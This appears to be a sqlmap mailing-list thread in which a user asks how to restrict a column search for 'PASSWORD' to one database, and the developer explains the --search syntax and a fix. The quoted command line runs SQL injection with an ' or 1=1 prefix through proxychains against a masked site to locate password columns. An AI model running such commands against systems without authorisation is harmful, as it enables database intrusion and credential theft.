Re: [sqlmap-users] how to search for column name in a specific database using '--search' ?
From: Miroslav S. <mir...@gm...> - 2011-12-02 17:34:33
This is an Oracle specific problem. Have to see how to properly deal with it.

Kind regards

2011/12/2 CoeTs7 <tm...@ho...>

> hi,
> thx for your reply, but it doesn't seem to work that way on my box:
>
> # proxychains svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev 2>/dev/null
> ProxyChains-3.1 (http://proxychains.sf.net)
> Checked out revision 4564.
> #./sqlmap.py -u 'http://xx.cfm' --data "xx=2&vLoginName=kahao" -p vLoginName --technique b --text-only --suffix " -- s" --prefix="' or 1=1 " --string "<b>" --timeout 100 --proxy 'http://192.168.1.12:8080' --search -D 'GVDBA' -C 'PASSWORD'
> ........omit..........
> do you want sqlmap to consider provided column(s):
> [1] as LIKE column names (default)
> [2] as exact column names
> >
>
> [06:29:01] [INFO] searching columns like 'PASSWORD'
> [06:29:01] [INFO] fetching number of tables containing columns like 'PASSWORD' in database 'USERS'
>
> i delete ./output/xxx.com and try this again, but it still runs this way.
> anything wrong with my operation?
>
> ------------------------------
> Date: Fri, 2 Dec 2011 14:27:35 +0100
> Subject: Re: [sqlmap-users] how to search for column name in a specific database using '--search' ?
> From: mir...@gm...
> To: tm...@ho...
> CC: sql...@li...
>
> Hi.
>
> First of all you can't use '%PASSWORD%' if you want to search for identifiers LIKE 'PASSWORD'. In your case just put: -D authdb --search -C PASSWORD.
>
> With the last commit (r4563) there is an upgrade in the --search mechanism that will better suit your needs.
>
> Now the lowest denominator dictates what is going to be searched. So:
> --search -D .. -T .. -C .. will search for column(s)
> --search -D .. -C .. will search for column(s)
> --search -D .. -T .. will search for table(s)
> --search -D .. will search for db(s)
> ...
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Dec 2, 2011 at 1:50 PM, Miroslav Stampar <mir...@gm...> wrote:
>
> Hi.
>
> You are right. The lowest common denominator should be searched for with --search (in this case that's column). Going to modify it and report back.
>
> Kind regards,
> Miroslav Stampar
>
> 2011/12/2 CoeTs7 <tm...@ho...>
>
> hi all. i'm wondering if there's a way to search for column name in a specific database while using '--search' ?
> i've tried '-D authdb --search -C "%PASSWORD%"' but sqlmap thinks that i'm trying to search a database named "authdb" and a column named like 'password'. I am sure that the password i want to know is in the database 'authdb' so i don't want to waste time searching in other dbs.
> Is there any way i can do this?
> thx a lot.

--
Miroslav Stampar
http://about.me/stamparm